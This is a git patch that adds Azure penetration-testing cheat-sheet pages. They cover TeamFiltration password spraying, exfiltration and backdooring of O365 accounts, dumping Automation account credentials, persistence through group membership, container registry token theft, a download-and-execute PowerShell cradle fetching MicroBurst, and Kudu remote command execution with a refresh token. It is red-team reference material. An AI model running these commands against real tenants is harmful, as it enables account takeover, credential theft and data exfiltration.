From 57e99121dc478c4c5c54b7fd3da745573a27ce19 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 3 Jan 2024 15:40:20 +0100 Subject: [PATCH] Azure - Pages v0.1 --- docs/cloud/azure/azure-ad-connect.md | 1 + docs/cloud/azure/azure-devices-users-sp.md | 15 ++++++ docs/cloud/azure/azure-enumeration.md | 18 +++++++ docs/cloud/azure/azure-persistence.md | 8 +++ .../azure-services-container-registry.md | 53 +++++++++++++++++++ docs/cloud/azure/azure-services-runbook.md | 50 +++++++++++++++-- .../azure/azure-services-storage-blob.md | 9 ++++ docs/cloud/azure/azure-services-web-apps.md | 21 ++++++++ 8 files changed, 172 insertions(+), 3 deletions(-) create mode 100644 docs/cloud/azure/azure-services-container-registry.md diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md index 2fc0d52..5a59dc6 100644 --- a/docs/cloud/azure/azure-ad-connect.md +++ b/docs/cloud/azure/azure-ad-connect.md @@ -50,6 +50,7 @@ PS > Set-AADIntUserPassword -SourceAnchor "" -Password "Password" ## Federation +* [Golden SAML](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/) ## AD Connect - Credentials diff --git a/docs/cloud/azure/azure-devices-users-sp.md b/docs/cloud/azure/azure-devices-users-sp.md index 2d02cf9..e3261b1 100644 --- a/docs/cloud/azure/azure-devices-users-sp.md +++ b/docs/cloud/azure/azure-devices-users-sp.md @@ -142,6 +142,21 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock ## Service Principals +```ps1 +PS C:\> Get-AzureADServicePrincipal + +ObjectId AppId DisplayName +-------- ----- ----------- +00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App +012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise +06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement +092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports +0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS +0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService +0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service +0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics +``` + ## Other diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index 31407ba..d8bbc49 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -44,6 +44,18 @@ PS C:> Get-AzureInTuneScript PS C:> Show-AzureKeyVaultContent -All ``` +* [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts + ```ps1 + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000 + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database + ``` * [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. * [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud. @@ -112,6 +124,12 @@ The default lockout policy tolerates 10 failed attempts, then lock out an accoun ```powershell o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com ``` +* [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration) + ```powershell + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt + TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00 + ``` ## Azure Services Enumeration diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md index 2d31fb8..adda022 100644 --- a/docs/cloud/azure/azure-persistence.md +++ b/docs/cloud/azure/azure-persistence.md @@ -15,6 +15,7 @@ PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' ``` + ## Add Service Principal * Generate a new service principal password/secret @@ -32,6 +33,13 @@ ``` +## Add User to Group + +```ps1 +Add-AzureADGroupMember -ObjectId -RefObjectId -Verbose +``` + + ## References * [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) diff --git a/docs/cloud/azure/azure-services-container-registry.md b/docs/cloud/azure/azure-services-container-registry.md new file mode 100644 index 0000000..5c95981 --- /dev/null +++ b/docs/cloud/azure/azure-services-container-registry.md @@ -0,0 +1,53 @@ +# Azure Services - Container Registry + +## Enumerate + +List container registries in the subscription using Azure CLI + +```ps1 +az login -u user@domain.onmicrosoft.com -p pass +az acr list -o table +``` + +Login to the Registry + +```ps1 +acr= # from the previous command +server=$(az acr login -n $acr --expose-token --query loginServer -o tsv) +token=$(az acr login -n $acr --expose-token --query accessToken -o tsv) +docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token +``` + +List the images in the ACR + +```ps1 +az acr repository list -n $acr +``` + +List version tags for an image +```ps1 +az acr repository show-tags -n $acr --repository mywebapp +``` + +Connect to the container registry from a PowerShell console, set the $server and $token variables, and pull the image from the registry + +```ps1 +# docker login ${registryURI} --username ${username} --password ${password} +$token="" +$server="" +docker login $server -u 00000000-0000-0000-0000-000000000000 -p $token +docker pull $server/mywebapp:v1 +``` + +List docker containers inside a registry + +```ps1 +IEX (New-Object Net.WebClient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") +Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 +Get-AzACR -username ${username} -password ${password} -registry ${registryURI} +``` + + +## References + +* [PENTESTING AZURE: RECON TECHNIQUES - April 29, 2022 Stefan Tita](https://securitycafe.ro/2022/04/29/pentesting-azure-recon-techniques/) \ No newline at end of file diff --git a/docs/cloud/azure/azure-services-runbook.md b/docs/cloud/azure/azure-services-runbook.md index b10f945..43a2c4a 100644 --- a/docs/cloud/azure/azure-services-runbook.md +++ b/docs/cloud/azure/azure-services-runbook.md @@ -1,8 +1,16 @@ -# Azure Services - Runbook +# Azure Services - Runbook and Automation + +## Runbook Runbook must be **SAVED** and **PUBLISHED** before running it. -## Create a Runbook +### List the Runbooks + +```ps1 +Get-AzAutomationAccount | Get-AzAutomationRunbook +``` + +### Create a Runbook * Check user right for automation ```powershell @@ -18,7 +26,27 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. * Start the Runbook: `Start-AzAutomationRunbook -RunbookName -RunOn Workergroup1 -AutomationAccountName -ResourceGroupName -Verbose` -## Persistence via Automation accounts +## Automation Account + +### List Automation Accounts + +Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment. + +```ps1 +Get-AzAutomationAccount +``` + +### Get Automation Credentials + +```ps1 +Get-AzAutomationAccount | Get-AzAutomationCredential +Get-AzAutomationAccount | Get-AzAutomationConnection +Get-AzAutomationAccount | Get-AzAutomationCertificate +Get-AzAutomationAccount | Get-AzAutomationVariable +``` + + +### Persistence via Automation Accounts * Create a new Automation Account * "Create Azure Run As account": Yes @@ -39,6 +67,22 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. ``` +## Desired State Configuration + +### List the DSC + +```ps1 +Get-AzAutomationAccount | Get-AzAutomationDscConfiguration +``` + +### Export the configuration + +```ps1 +$DSCName = ${dscToExport} +Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -march $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug +``` + + ## References * []() \ No newline at end of file diff --git a/docs/cloud/azure/azure-services-storage-blob.md b/docs/cloud/azure/azure-services-storage-blob.md index 1c41c33..f06329a 100644 --- a/docs/cloud/azure/azure-services-storage-blob.md +++ b/docs/cloud/azure/azure-services-storage-blob.md @@ -5,6 +5,7 @@ * Data Tables - `*.table.core.windows.net` * Queues - `*.queue.core.windows.net` + ## Enumerate blobs ```powershell @@ -13,6 +14,7 @@ PS > Invoke-EnumerateAzureBlobs -Base -OutputFile azureblobs.txt Found Storage Account - redacted.blob.core.windows.net ``` + ## List and download blobs ```powershell @@ -22,6 +24,13 @@ PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name -Resou PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount -name -ResourceGroupName ).context -Blob ``` +Retrieve exposed containers with public access + +```ps1 +PS Az> (Get-AzStorageAccount | Get-AzStorageContainer).cloudBlobContainer | select Uri,@{n='PublicAccess';e={$_.Properties.PublicAccess}} +``` + + ## SAS URL * Use [Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/) diff --git a/docs/cloud/azure/azure-services-web-apps.md b/docs/cloud/azure/azure-services-web-apps.md index 591d891..1597187 100644 --- a/docs/cloud/azure/azure-services-web-apps.md +++ b/docs/cloud/azure/azure-services-web-apps.md @@ -1,8 +1,29 @@ # Azure Services - Web Apps +## List Web App + +```ps1 +az webapp list +``` + +## Execute Commands + +```ps1 +$ARMToken = Get-ARMTokenWithRefreshToken ` + -RefreshToken "0.ARwA6WgJJ9X2qk..." ` + -TenantID "contoso.onmicrosoft.com" + +Invoke-AzureRMWebAppShellCommand ` + -KuduURI "https://.scm.azurewebsites.net/api/command" ` + -Token $ARMToken ` + -Command "whoami" +``` ## SSH Connection +First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode` + + ```powershell az webapp create-remote-connection --subscription --resource-group -n ```